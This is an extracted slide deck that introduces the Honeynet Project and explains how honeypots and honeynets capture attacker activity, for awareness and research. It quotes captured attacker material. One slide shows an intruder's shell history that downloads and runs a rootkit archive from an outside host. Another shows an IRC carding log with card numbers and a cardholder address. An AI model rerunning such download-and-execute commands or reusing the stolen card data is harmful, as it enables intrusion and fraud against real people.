Honeynets and The Honeynet Project

1
Honeynets and The Honeynet Project
2
Speaker

• List name, affiliations, and involvement with the
  Project.

3
Purpose

• To explain the Honeynet Project, what we have
  learned, and what honeynets are.

4
Agenda

• The Project and Research Alliance
• Examples of Research
• How Honeynets Work
• Learning More

5
Honeynet Project
6
Problem

• How can we defend against an enemy, when we dont
  even know who the enemy is?

7
One Possible Solution

• To learn the tools, tactics, and motives of
  the blackhat community, and share the lessons
  learned.

8
Honeynet Project

• Volunteer organization of security professionals.
• Open Source, share all of our research and
  findings.
• Deploy networks around the world to be hacked.
• Everything we capture is happening in the wild.
• We have no agenda, no employees, nor anything to
  sell.

9
Goals

• Awareness To raise awareness of the threats that
  exist.
• Information For those already aware, to teach
  and inform about the threats.
• Research To give organizations the capabilities
  to learn more on their own.

10
Project Organization

• Non-profit (501c3) organization
• Board of Directors
• No more then two members from any organization.
• Funded by the community, including the NIC.
• Diverse set of skills and experiences.
• Team works virtually, from around the world.

11
Honeynet Research Alliance

• Starting in 2002, the Alliance is a forum of
  organizations around the world actively
  researching, sharing and deploying Honeynet
  technologies.
• http//www.honeynet.org/alliance/

12
Alliance Members

• South Florida Honeynet Project
• Georgia Technical Institute
• Azusa Pacific University
• Paladion Networks Honeynet Project (India)
• Internet Systematics Lab Honeynet Project
  (Greece)
• Mexico Honeynet (Mexico)
• Honeynet.BR (Brazil)
• Irish Honeynet
• Norwegian Honeynet
• UK Honeynet
• French Honeynet Project
• Italian Honeynet Project
• German Honeynet Project
• Spanish Honeynet Project
• Singapore Honeynet Project

13
Examples of Research
14
What we have captured

• The Honeynet Project has captured primarily
  external threats that focus on targets of
  opportunity.
• Little has yet to be captured on advanced
  threats, few honeynets to date have been designed
  to capture them.

15
The Threat

• Hundreds of scans a day.
• Fastest time honeypot manually compromised, 15
  minutes (worm, under 60 seconds).
• Life expectancies vulnerable Win32 system is
  under three hours, vulnerable Linux system is
  three months.
• Primarily cyber-crime, focused on Win32 platforms
  and their users.
• Attackers can control thousands, if not hundreds
  of thousands of systems.
• Only getting worse, because the crime pays and
  becoming highly organized.

16
Who am I?
17
That Was Then
Jan 8 184812 HISTORY PID1246 UID0 lynx
www.becys.org/LUCKROOT.TAR Jan 8 184831
HISTORY PID1246 UID0 y Jan 8 184845 HISTORY
PID1246 UID0 tar -xvfz LUCKROOT.TAR Jan 8
184859 HISTORY PID1246 UID0 tar -xzvf Lu Jan
8 184901 HISTORY PID1246 UID0 tar -xzvf
L Jan 8 184903 HISTORY PID1246 UID0 tar
-xzvf LUCKROOT.TAR Jan 8 184906 HISTORY
PID1246 UID0 cd luckroot Jan 8 184913
HISTORY PID1246 UID0 ./luckgo 216 210 Jan 8
185107 HISTORY PID1246 UID0 ./luckgo 200
120 Jan 8 185143 HISTORY PID1246 UID0
./luckgo 64 120 Jan 8 185200 HISTORY PID1246
UID0 ./luckgo 216 200
18
This is Now
19
DDoS for Money
J4ck why don't you start charging for packet
attacks? J4ck "give me x amount and I'll take
bla bla offline for this amount of
time J1LL it was illegal last I checked J4ck
heh, then everything you do is illegal. Why not
make money off of it? J4ck I know plenty of
people that'd pay exorbatent amounts for
packeting
20
Credit Cards Exchanging
045516 COCO_JAA !cc 045523 Chk 0,19(0
COCO_JAA 9)0 CC for U 4,1 Bob JohnsP. O.
Box 126Wendel, CA 25631United
States510-863-48844407070000588951 06/05
(All This ccs update everyday From My Hacked
shopping Database - You must regular come here
for got all this ccs) 8 9(11 TraDecS Chk_Bot
FoR goldcard9) 045542 COCO_JAA !cclimit
4407070000588951 045546 Chk 0,19(0 COCO_JAA
9)0 Limit for Ur MasterCard (5407070000788951)
0.881 (This Doesn't Mean Its Valid) 4 0(11
TraDecS Chk_bot FoR channel) 045655 COCO_JAA
!cardablesite 045722 COCO_JAA !cardable
electronics 045727 Chk 0,19(0 COCO_JAA 9)0
Site where you can card electronics 9(11
TraDecS Chk_bot FoR goldcard9) 045809
COCO_JAA !cclimit 4234294391131136 045812
Chk 0,19(0 COCO_JAA 9)0 Limit for Ur Visa
(4264294291131136) 9.697 (This Doesn't Mean
Its Valid) 4 0(11 TraDecS Chk_bot FoR channel)
21
How Honeynets Work
22
Honeypots

• A honeypot is an information system resource
  whose value lies in unauthorized or illicit use
  of that resource.
• Has no production value, anything going to or
  from a honeypot is likely a probe, attack or
  compromise.
• Primary value to most organizations is
  information.

23
Advantages

• Collect small data sets of high value.
• Reduce false positives
• Catch new attacks, false negatives
• Work in encrypted or IPv6 environments
• Simple concept requiring minimal resources.

24
Disadvantages

• Limited field of view (microscope)
• Risk (mainly high-interaction honeypots)

25
Types

• Low-interaction
• Emulates services, applications, and OSs.
• Low risk and easy to deploy/maintain, but capture
  limited information.
• High-interaction
• Real services, applications, and OSs
• Capture extensive information, but high risk and
  time intensive to maintain.

26
Examples of Honeypots
Low Interaction

• BackOfficer Friendly
• KFSensor
• Honeyd
• Honeynets

High Interaction
27
Honeynets

• High-interaction honeypot designed to capture
  in-depth information.
• Information has different value to different
  organizations.
• Its an architecture you populate with live
  systems, not a product or software.
• Any traffic entering or leaving is suspect.

28
How it works

• A highly controlled network where every packet
  entering or leaving is monitored, captured, and
  analyzed.
• Data Control
• Data Capture

http//www.honeynet.org/papers/honeynet/
29
Honeynet - GenII
30
No Data Control
31
Data Control
32
(No Transcript)
33
Data Capture - Sebek

• Hidden kernel module that captures all activity
• Dumps activity to the network.
• Attacker cannot sniff any traffic based on magic
  number and dst port.

34
(No Transcript)
35
Bootable CDROM
36
Distributed Capabilities
37
Issues

• Require extensive resources to properly maintain.
• Detection and anti-honeynet technologies have
  been introduced.
• Can be used to attack or harm other non-Honeynet
  systems.
• Privacy can be a potential issue.

38
Legal Contact for .mil / .gov

• Department of Justice Computer Crime and
  Intellectual Property Section.
• Paul Ohm
• Number (202) 514.1026
• E-Mail paul.ohm_at_usdoj.gov

39
Learning More
40
Challenges

• The opportunity to study real attacks on your
  own, compare your analysis with others, and learn
  about blackhats.
• Scan of the Month challenges
• Forensic Challenge
• Reverse Challenge
• http//www.honeynet.org/misc/

41
Know Your Enemy papers

• Series of papers dedicated to honeynet research
  and their findings.
• Translated into over 10 different languages.
• http//www.honeynet.org/papers/

42
Know Your Enemy 2nd Edition
http//www.honeynet.org/book
43
Contributing
Advanced Network Management Lab
YOU?
44
How to contribute

• Volunteer!
• Honeywall CDROM Subscription
• PayPal Donation
• Buy our Book
• Funding

ltproject_at_honeynet.orggt http//www.honeynet.org/fun
ds/
45
Conclusion

• The Honeynet Project is a non-profit, volunteer
  organization researching cyber threats using
  honeynet technologies, and sharing those lessons
  learned.
• It is hoped our research can improve the
  awareness and security of the Internet community.

46

• http//www.honeynet.org
• ltproject_at_honeynet.orggt